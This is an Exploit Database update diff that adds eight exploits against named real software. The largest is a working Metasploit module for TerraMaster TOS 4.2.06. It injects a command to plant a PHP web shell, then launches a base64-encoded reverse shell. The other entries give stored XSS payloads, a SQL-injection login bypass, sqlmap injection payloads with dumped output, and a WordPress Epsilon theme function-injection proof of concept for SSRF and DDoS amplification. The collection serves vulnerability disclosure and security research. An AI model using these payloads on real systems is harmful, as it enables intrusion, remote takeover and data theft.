DB: 2020-12-24

8 changes to exploits/shellcodes

Class Scheduling System 1.0 - Multiple Stored XSS
Online Learning Management System 1.0 - Authentication Bypass
Online Learning Management System 1.0 - Multiple Stored XSS
Online Learning Management System 1.0 - 'id' SQL Injection
Wordpress Epsilon Framework Multiple Themes - Unauthenticated Function Injection
Sales and Inventory System for Grocery Store 1.0 - Multiple Stored XSS
TerraMaster TOS 4.2.06 - Unauthenticated Remote Code Execution (Metasploit)
Baby Care System 1.0 - 'roleid' SQL Injection

exploits/linux/webapps/49330.rb

@@ -0,0 +1,120 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => "TerraMaster TOS 4.2.06 - Unauthenticated Remote Code Execution",
+      'Description' => %q(
+        This module exploits a unauthenticated command execution vulnerability in TerraMaster TOS.
+        The "Event" parameter in "include/makecvs.php" contains a vulnerability. 
+        "filename" is executing command on system during ".csv" creation. 
+        In order to do this, it is not necessary to have a session in the application.
+        Therefore an unathenticated user can execute the command on the system.
+      ),
+      'License' => MSF_LICENSE,
+      'Author' =>
+        [
+          'AkkuS <Özkan Mustafa Akkuş>', #PoC & Metasploit module
+          'IHTeam' # Discovery
+        ],
+      'References' =>
+        [
+          ['CVE', '2020-'],
+          ['URL', 'http://www.pentest.com.tr/exploits/TerraMaster-TOS-4-2-06-Unauthenticated-Remote-Code-Execution.html'],
+          ['URL', 'https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/']
+        ],
+      'Platform' => 'unix',
+      'Arch' => ARCH_CMD,
+      'Targets' => [['Automatic', {}]],
+      'Privileged' => false,
+      'DisclosureDate' => "Dec 12 2020",
+      'DefaultTarget' => 0,
+      'DefaultOptions' =>
+        {
+          'RPORT' => 8181,
+          'SSL'   => false,
+          'PAYLOAD' => 'cmd/unix/reverse_perl' }))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, "Base ERP directory path", '/'])
+      ]
+    )
+  end
+
+  def run_cmd(file,cmd)
+
+    res = send_request_cgi(
+      {
+        'method' => 'POST',
+        'ctype'  => 'application/x-www-form-urlencoded',
+        'uri'     =>  normalize_uri(target_uri.path, "#{file}"),
+        'data' => "cmd=#{cmd}"
+      })
+  end
+
+  def upload_shell
+    sname = Rex::Text.rand_text_alpha_lower(8) + ".php"
+    payload_post = "http|echo \"<?php echo(passthru(\\$_REQUEST['cmd']));?>\" >> /usr/www/#{sname} && chmod +x /usr/www/#{sname}||"
+    @b64p = Rex::Text.encode_base64(payload.encoded)
+    perl_payload = 'bash -c "{echo,' + "#{@b64p}" + '}|{base64,-d}|{bash,-i}"'
+    payload = Rex::Text.uri_encode(perl_payload)
+
+    res = send_request_cgi(
+      'method'  => 'GET',
+      'uri' => normalize_uri(target_uri.path, "include", "makecvs.php"),
+      'vars_get' => {
+        'Event' => "#{payload_post}",
+      }
+    )
+
+    res = send_request_cgi(
+      'method'  => 'POST',
+      'uri'     =>  normalize_uri(target_uri.path, "#{sname}"),
+      'vars_post' => {
+        'cmd' => 'id'
+      }
+    )
+
+    if res && res.code == 200 && res.body.include?('uid=')
+      print_good("Upload completed successfully and command executed!")
+      run_cmd("#{sname}",payload)
+    else
+      fail_with(Failure::NoAccess, 'Error occurred during uploading!')
+    end
+  end
+
+  def exploit
+    unless Exploit::CheckCode::Vulnerable == check
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+    end
+    upload_shell    
+  end
+
+  def check
+
+    res = send_request_cgi(
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, "version"),
+    )
+
+    if res && res.code == 200 && res.body
+      version = res.body.split(".0_")[1]
+      print_status("Version : " + res.body)
+      return CheckCode::Detected if version.nil?
+      version = version.split(".").join('')
+      if version <= "4206"
+        return CheckCode::Vulnerable
+      else
+        return CheckCode::Safe
+      end
+    end
+  end
+end

exploits/php/webapps/49323.txt

@@ -0,0 +1,33 @@
+# Exploit Title:  Class Scheduling System 1.0 - Multiple Stored XSS
+# Exploit Author: Aakash Madaan (Godsky)
+# Date: 2020-12-22
+# Vendor Homepage: https://www.sourcecodester.com/php/5175/class-scheduling-system.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=5175&title=Class+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Category: Web Application
+# Tested on: Parrot OS
+
+[+] Step 1. Login to the application with admin credentials
+
+[+] Step 2.1(a). Click on "Department" page.  {Uri :http(s)://<host>/admin/department.php}
+    Step 2.1(b). In the "Person Incharge" field, use XSS payload '"><script>alert("Department")</script>' as the name of new course and click on save.
+                 [ Note : The XSS can also be triggered if we put the same payload in "Title" field ]
+    Step 2.1(c). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Department", your XSS Payloads will be triggered.
+
+[+] Step 2.2(a). Click on "Subject" page.  {Uri :http(s)://<host>/admin/subject.php}
+    Step 2.2(b). In the "Subject Code" field, use XSS payload '"><script>alert("Subject")</script>' as the name of new course and click on save.
+                 [ Note : The XSS can also be triggered if we put the same payload in "Title" field ]
+    Step 2.2(c). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Subject", your XSS Payloads will be triggered.
+
+[+] Step 2.3(a). Click on "Course" page.  {Uri :
+http(s)://<host>/admin/course.php}
+    Step 2.3(b). In the "Course Year" field, use XSS payload '"><script>alert("Course")</script>' as the name of new course and click on save.
+                 [ Note : The XSS can also be triggered if we put the same payload in "Major" field ]
+    Step 2.3(c). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Course", your XSS Payloads will be triggered.
+
+[+] Step 2.3(a). Click on "Record" page.  {Uri :http(s)://<host>/admin/record.php}
+    Step 2.3(b). In the "Name" field, use XSS payload '"><script>alert("Record")</script>' as the name of new course and click onsave.
+                 [ Note : The XSS can also be triggered if we put the same payload in "Academic Rank" or "Designation" field ]
+    Step 2.3(c). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Record", your XSS Payloads will be triggered.
+
+[+] Step 3. This should trigger the XSS payload and anytime you click on respective pages, your stored XSS payload will be triggered.

exploits/php/webapps/49324.txt

@@ -0,0 +1,19 @@
+# Exploit Title: Online Learning Management System 1.0 - Authentication Bypass
+# Exploit Author: Aakash Madaan (Godsky)
+# Date: 2020-12-22
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/7339/learning-management-system.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=7339&title=Online+Learning+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Category: Web Application
+# Tested on: Parrot OS
+# Description: Easy authentication bypass vulnerability on the application allows an attacker to log in as the registered user without password.
+
+Step 1: Go to http://localhost/ and register a new user or try to login as
+already registered user (Ubas).
+
+Step 2: On the login page, use query { Ubas' or '1'='1 } as username
+
+Step 2: On the login page, use same query { Ubas' or '1'='1 } as password
+
+All set you should be logged in as Ubas.

exploits/php/webapps/49325.txt

@@ -0,0 +1,54 @@
+# Exploit Title:  Online Learning Management System 1.0 - Multiple Stored XSS
+# Exploit Author: Aakash Madaan (Godsky)
+# Date: 2020-12-22
+# Vendor Homepage: https://www.sourcecodester.com/php/7339/learning-management-system.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=7339&title=Online+Learning+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Category: Web Application
+# Tested on: Parrot OS
+
+[+] Step 1. Login to the application with admin credentials
+
+
+[+] Step 2.1
+
+    (a). Click on "Subject" page.  {Uri :http(s)://<host>/admin/subject.php}
+    (b). Now click on the "Add Subject" button to add a new subject.
+    (c). In the "Subject Title" field, use XSS payload '"><script>alert("subject")</script>' as the name of new course (Also fill the respective sections if required).
+    (d). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Subject" section, your XSS Payloads will be triggered.
+
+[+] Step 2.2
+
+    (a). Click on "Class" page.  {Uri : http(s)://<host>/admin/class.php}
+    (b). Under the "Add class" in the "Class Name" field, use XSS payload '"><script>alert("class")</script>' as the name of new course.
+    (c). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Class" section, your XSS Payloads will be triggered.
+
+[+] Step 2.3
+
+    (a). Click on "Admin Users" page.  {Uri :http(s)://<host>/admin/admin_user.php}
+    (b). Under the "Add user" in the "First Name" field, use XSS payload '"><script>alert("Admin User")</script>' as the name of new course (Also fill the respective sections if required).
+              [ Note : The XSS can also be triggered if we put the same payload in "Last Name" or "Username" fields ]
+    (c). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Admin Users", your XSS Payloads will be triggered.
+
+[+] Step 2.4
+
+    (a). Click on "Department" page.  {Uri :http(s)://<host>/admin/department.php}
+    (b). In the "Department" field, use XSS payload '"><script>alert("Department")</script>' as the name of new course (Also fill the respective sections if required).
+              [ Note : The XSS can also be triggered if we put the same payload in "Person Incharge" field ]
+    (c). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Department", your XSS Payloads will be triggered.
+
+[+] Step 2.5
+
+    (a). Click on "Students" page.  {Uri :http(s)://<host>/admin/students.php}
+    (b). Under "Add Student" in the "First Name" field, use XSS payload '"><script>alert("students")</script>' as the name of new course (Also fill the respective sections if required).
+              [ Note : The XSS can also be triggered if we put the same payload in "Last Name" field ]
+    (c). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Students", your XSS Payloads will be triggered.
+
+[+] Step 2.6
+
+    (a). Click on "Teachers" page.  {Uri :http(s)://<host>/admin/teachers.php}
+    (b). Under "Add Student" in the "First Name" field, use XSS payload '"><script>alert("students")</script>' as the name of new course (Also fill the respective sections if required).
+              [ Note : The XSS can also be triggered if we put the same payload in "Last Name" field ]
+    (c). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Teachers", your XSS Payloads will be triggered.
+
+[+] Step 3. This should trigger the XSS payload and anytime you click on respective pages, your stored XSS payloads will be triggered.

exploits/php/webapps/49326.txt

@@ -0,0 +1,55 @@
+# Exploit Title:  Online Learning Management System 1.0 - 'id' SQL Injection
+# Exploit Author: Aakash Madaan (Godsky)
+# Date: 2020-12-22
+# Vendor Homepage: https://www.sourcecodester.com/php/7339/learning-management-system.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=7339&title=Online+Learning+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Category: Web Application
+# Tested on: Parrot OS
+
+Step 1. Login to the application with admin credentials
+
+Step 2. Click on "Departments" page.
+
+Step 3. Choose any event and select "edit". The url should be "http(s)://<host>/admin/edit_department.php?id=4"
+
+Step 4. Capture the request to the "edit" event page in burpsuite.
+
+Step 5. Save the captured request and run sqlmap on it using "sqlmap -r request --time-sec=5 --dbs
+
+---
+Parameter: id (GET)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: id=4' AND (SELECT 7775 FROM (SELECT(SLEEP(5)))vwwE) AND
+'OoVY'='OoVY
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 3 columns
+    Payload: id=-9296' UNION ALL SELECT
+NULL,NULL,CONCAT(0x716a707871,0x64766351487955536b5276427a5a416a764e6a4b46476a57704f6d73425368544153494e53525970,0x716a716a71)--
+-
+---
+[16:01:08] [INFO] the back-end DBMS is MySQL
+back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
+[16:01:08] [INFO] fetching database names
+[16:01:12] [INFO] retrieved: 'information_schema'
+[16:01:13] [INFO] retrieved: 'mysql'
+[16:01:15] [INFO] retrieved: 'performance_schema'
+[16:01:16] [INFO] retrieved: 'css'
+[16:01:18] [INFO] retrieved: 'sales_inventory_db'
+[16:01:19] [INFO] retrieved: 'rios_db'
+[16:01:19] [INFO] retrieved: 'capstone'
+available databases [7]:
+
+[*] capstone
+[*] css
+[*] information_schema
+[*] mysql
+[*] performance_schema
+[*] rios_db
+[*] sales_inventory_db
+
+
+Step 6. Sqlmap should inject the web-app successfully which leads to
+information disclosure

exploits/php/webapps/49327.js

@@ -0,0 +1,161 @@
+# Exploit Title: Wordpress Epsilon Framework Multiple Themes - Unauthenticated Function Injection
+# Date: 22/12/2020
+# Exploit Authors: gx1 <g.per45[at]gmail.com> lotar <Giuseppe.DiTerlizzi[at]nttdata.com>
+# Vendor Homepage: https://wordpress.com/
+# Software Link:   https://github.com/WordPress/WordPress
+# Affected Themes: 
+
+	shapely        -	 Fixed in version 1.2.9
+	newsmag        -	 Fixed in version 2.4.2
+	activello      - 	 Fixed in version 1.4.2
+	illdy          -	 Fixed in version 2.1.7
+	allegiant      - 	 Fixed in version 1.2.6
+	newspaper-x    - 	 Fixed in version 1.3.2
+	pixova-lite    - 	 Fixed in version 2.0.7
+	brilliance     - 	 Fixed in version 1.3.0
+	medzone-lite   - 	 Fixed in version 1.2.6
+	regina-lite    - 	 Fixed in version 2.0.6
+	transcend      - 	 Fixed in version 1.2.0
+	affluent       - 	 Fixed in version 1.1.2
+	bonkers        - 	 Fixed in version 1.0.6
+	antreas        - 	 Fixed in version 1.0.7
+	naturemag-lite - 	 No known fix
+	
+# Tested on: Wordpress 5.6
+# CVE :  N/A
+
+# References: 
+
+- https://wpscan.com/vulnerability/10417
+- https://blog.nintechnet.com/unauthenticated-function-injection-vulnerability-fixed-in-15-wordpress-themes/
+- https://www.wordfence.com/blog/2020/11/large-scale-attacks-target-epsilon-framework-themes/
+- https://developer.wordpress.org/reference/classes/requests/request_multiple/
+
+Description: 
+
+Fifteen WordPress themes use a vulnerable version of epsilon-framework that vulnerable to a critical unauthenticated function injection vulnerability, due to the lack of capability and CSRF nonce checks in AJAX actions.
+
+Technical Details: 
+
+The vulnerability is present in epsilon_framework_ajax_action AJAX action that is accessible to all users, authenticated or not. 
+The function takes three POST user input, assign them to the $class, $method and $args variables and calls the class with arguments: 
+
+================================================================
+
+  public function epsilon_framework_ajax_action() {
+      if ( 'epsilon_framework_ajax_action' !== $_POST['action'] ) {
+         wp_die(
+            json_encode(
+               array(
+                  'status' => false,
+                  'error'  => 'Not allowed',
+               )
+            )
+         );
+      }
+   
+      if ( count( $_POST['args']['action'] ) !== 2 ) {
+         wp_die(
+            json_encode(
+               array(
+                  'status' => false,
+                  'error'  => 'Not allowed',
+               )
+            )
+         );
+      }
+   
+      if ( ! class_exists( $_POST['args']['action'][0] ) ) {
+         wp_die(
+            json_encode(
+               array(
+                  'status' => false,
+                  'error'  => 'Class does not exist',
+               )
+            )
+         );
+      }
+   
+      $class  = $_POST['args']['action'][0];
+      $method = $_POST['args']['action'][1];
+      $args   = $_POST['args']['args'];
+   
+      $response = $class::$method( $args );
+================================================================  
+	
+Nonce is checked only if it set.
+As it is possible to observe, the vulnerability can be exploited if the attacker is able to use a class that contains a public static method that accept an array argument. 
+Useful methods should be investigated in the context of the targeted website, because they could depend by the installed plugins and themes. 
+On a wordpress instance, it is possible to store the list of classes containing public static methods by adding this code in epsilon_framework_ajax_action function: 
+
+================================================================
+function testClasses() {
+       error_log("[+] IN TEST CLASSES");
+       mkdir("/tmp/classes");
+       foreach(get_declared_classes() as $c) { 
+         mylog($c);
+         $f = fopen('/tmp/classes/'.$c, 'w');
+         $reflection = new ReflectionClass($c);
+         $staticMethods = $reflection->getMethods(ReflectionMethod::IS_STATIC); 
+         foreach($staticMethods as $sm) {
+           mylog($sm);
+           fwrite($f, $sm . "\n");
+         }
+         fclose($f);
+       }   
+     }   
+     testClasses();
+===============================================================
+
+We have found Requests::request_multiple static method(array $requests) in the core of Wordpress that can be used to send arbitrary HTTP requests, with critical dangerous effects for the vulnerable target. 
+
+Proof Of Concept: 
+
+The following code: 
+
+===============================================================
+<html>
+<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
+<script>
+$(document).ready(function(){
+	console.log("document ready");
+	var ajax_url = "<vulnerable-wordpress-ip>/wp-admin/admin-ajax.php"
+	var data = {
+		'action':  'epsilon_framework_ajax_action',
+		'args': {
+			'action': ["Requests", "request_multiple"],
+			'args' : [{"url": "<poc-website>"}]
+		}
+	}
+	$.post(ajax_url, data, function(response) {
+		console.log("in response")
+	});
+});
+</script>
+</html> 
+===============================================================
+
+sends a request to <poc-request>: 
+
+==============================================================================================================================
+<vulnerable-wordpress-ip>- - [22/Dec/2020:18:36:51 +0000] "GET / HTTP/1.1" 200 3898 "<poc-website>" "php-requests/1.7-3470169"
+==============================================================================================================================
+
+
+Impacts:
+
+1. DDOS amplification against a target: the attacker can exploit vulnerable wordpress sites to send ajax requests with args array containing multiple occurrences of the target. In this way, he can perform an amplification attack against a target website. 
+ 	var data = {
+		'action':  'epsilon_framework_ajax_action',
+
+		'args': {
+			'action': ["Requests", "request_multiple"],
+			'args' : [{"url": "<target>"}, {"url": "<target>"}, {"url": "<target>"}, ...]
+		}
+	}
+	
+2. SSRF: the attacker can exploit Requests::request_multiple method to perform a Server-Side Request Forgery and obtain access to internal network through vulnerable Wordpress site.
+3. Wordpress DoS: if the attacker creates a specific POST request that contains a request to "/wp-admin/admin-ajax.php" as data he could be able to create an internal loop that crashes Wordpress site. 
+
+Solution: 
+In Affected Themes we show the fixed versions.

exploits/php/webapps/49329.txt

@@ -0,0 +1,16 @@
+# Exploit Title: Sales and Inventory System for Grocery Store 1.0 - Multiple Stored XSS
+# Exploit Author: Vijay Sachdeva (pwnshell)
+# Date: 2020-12-23
+# Vendor Homepage: https://www.sourcecodester.com/php/11238/sales-and-inventory-system-grocery-store.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=11238&title=Sales+and+Inventory+System+for+Grocery+Store+using+PHP%2FPDO+Full+Source+Code
+# Tested on Kali Linux
+
+Step 1: Log in to the application with admin credentials
+
+Step 2: Click on "Customer" on the left side, then click "Add Customer".
+
+Step 3. Input "<IMG """><SCRIPT>alert("XSS")</SCRIPT>">" in "First Name" field of the "Add Customer" form.
+
+Step 4. Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on the "Customer" page, your XSS payload will be triggered.
+
+Note: Stored XSS can also be found on the "Product" page, select any product and then go to "Action" to edit it. Input your payload "<IMG"""><SCRIPT>alert("XSS")</SCRIPT>">" in any of the field and your XSS payload will trigger.

exploits/php/webapps/49331.txt

@@ -0,0 +1,83 @@
+# Exploit Title: Baby Care System 1.0 - 'roleid' SQL Injection
+# Exploit Author: Vijay Sachdeva
+# Date: 2020-12-23
+# Vendor Homepage: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14622&title=Baby+Care+System+in+PHP%2FMySQLi+with+Full+Source+Code+
+# Affected Version: Version 1
+# Tested on Kali Linux
+
+Step 1. Log in to the application with admin credentials.
+
+Step 2. Click on "MENUS" on the left side and then edit any "Page Role".
+
+Step 3. On the edit page, the URL should be: http://localhost/BabyCare-master/admin.php?id=pagerole&action=edit&roleid=7
+
+Step 4. Run sqlmap on the URL where the "roleid" parameter is given
+
+sqlmap -u "
+http://192.168.1.240/BabyCare-master/admin.php?id=pagerole&action=edit&roleid=7"
+--banner
+
+---
+
+Parameter: roleid (GET)
+
+    Type: boolean-based blind
+
+    Title: AND boolean-based blind - WHERE or HAVING clause
+
+    Payload: id=pagerole&action=edit&roleid=8' AND 3077=3077 AND
+'IPDn'='IPDn
+
+
+    Type: error-based
+
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
+BY clause (FLOOR)
+
+    Payload: id=pagerole&action=edit&roleid=8' AND (SELECT 2834 FROM(SELECT
+COUNT(*),CONCAT(0x7170767871,(SELECT
+(ELT(2834=2834,1))),0x71717a6271,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'jnFT'='jnFT
+
+
+    Type: time-based blind
+
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+
+    Payload: id=pagerole&action=edit&roleid=8' AND (SELECT 4559 FROM
+(SELECT(SLEEP(5)))jaEa) AND 'iBGT'='iBGT
+
+
+    Type: UNION query
+
+    Title: Generic UNION query (NULL) - 4 columns
+
+    Payload: id=pagerole&action=edit&roleid=-2488' UNION ALL SELECT
+CONCAT(0x7170767871,0x7577594366596d7077424f5746685366434a5244775565756b7a41566d63546c5156564e6d67556e,0x71717a6271),NULL,NULL,NULL--
+-
+
+---
+
+[05:32:00] [INFO] the back-end DBMS is MySQL
+
+[05:32:00] [INFO] fetching banner
+
+back-end DBMS: MySQL >= 5.0 (MariaDB fork)
+
+banner: '10.3.24-MariaDB-2'
+
+---
+
+[08:18:34] [INFO] the back-end DBMS is MySQL
+
+[08:18:34] [INFO] fetching banner
+
+back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
+
+banner: '10.3.24-MariaDB-2'
+
+
+---
+
+Step 5. Sqlmap should inject the web-app successfully which leads to information disclosure.

files_exploits.csv

@@ -43535,3 +43535,11 @@ id,file,description,date,author,type,platform,port
 49319,exploits/php/webapps/49319.txt,"Artworks Gallery Management System 1.0 - 'id' SQL Injection",2020-12-22,"Vijay Sachdeva",webapps,php,
 49320,exploits/php/webapps/49320.txt,"Faculty Evaluation System 1.0 - Stored XSS",2020-12-22,"Vijay Sachdeva",webapps,php,
 49321,exploits/linux/webapps/49321.py,"TerraMaster TOS 4.2.06 - RCE (Unauthenticated)",2020-12-22,IHTeam,webapps,linux,
+49323,exploits/php/webapps/49323.txt,"Class Scheduling System 1.0 - Multiple Stored XSS",2020-12-23,"Aakash Madaan",webapps,php,
+49324,exploits/php/webapps/49324.txt,"Online Learning Management System 1.0 - Authentication Bypass",2020-12-23,"Aakash Madaan",webapps,php,
+49325,exploits/php/webapps/49325.txt,"Online Learning Management System 1.0 - Multiple Stored XSS",2020-12-23,"Aakash Madaan",webapps,php,
+49326,exploits/php/webapps/49326.txt,"Online Learning Management System 1.0 - 'id' SQL Injection",2020-12-23,"Aakash Madaan",webapps,php,
+49327,exploits/php/webapps/49327.js,"Wordpress Epsilon Framework Multiple Themes - Unauthenticated Function Injection",2020-12-23,gx1,webapps,php,
+49329,exploits/php/webapps/49329.txt,"Sales and Inventory System for Grocery Store 1.0 - Multiple Stored XSS",2020-12-23,"Vijay Sachdeva",webapps,php,
+49330,exploits/linux/webapps/49330.rb,"TerraMaster TOS 4.2.06 - Unauthenticated Remote Code Execution (Metasploit)",2020-12-23,AkkuS,webapps,linux,
+49331,exploits/php/webapps/49331.txt,"Baby Care System 1.0 - 'roleid' SQL Injection",2020-12-23,"Vijay Sachdeva",webapps,php,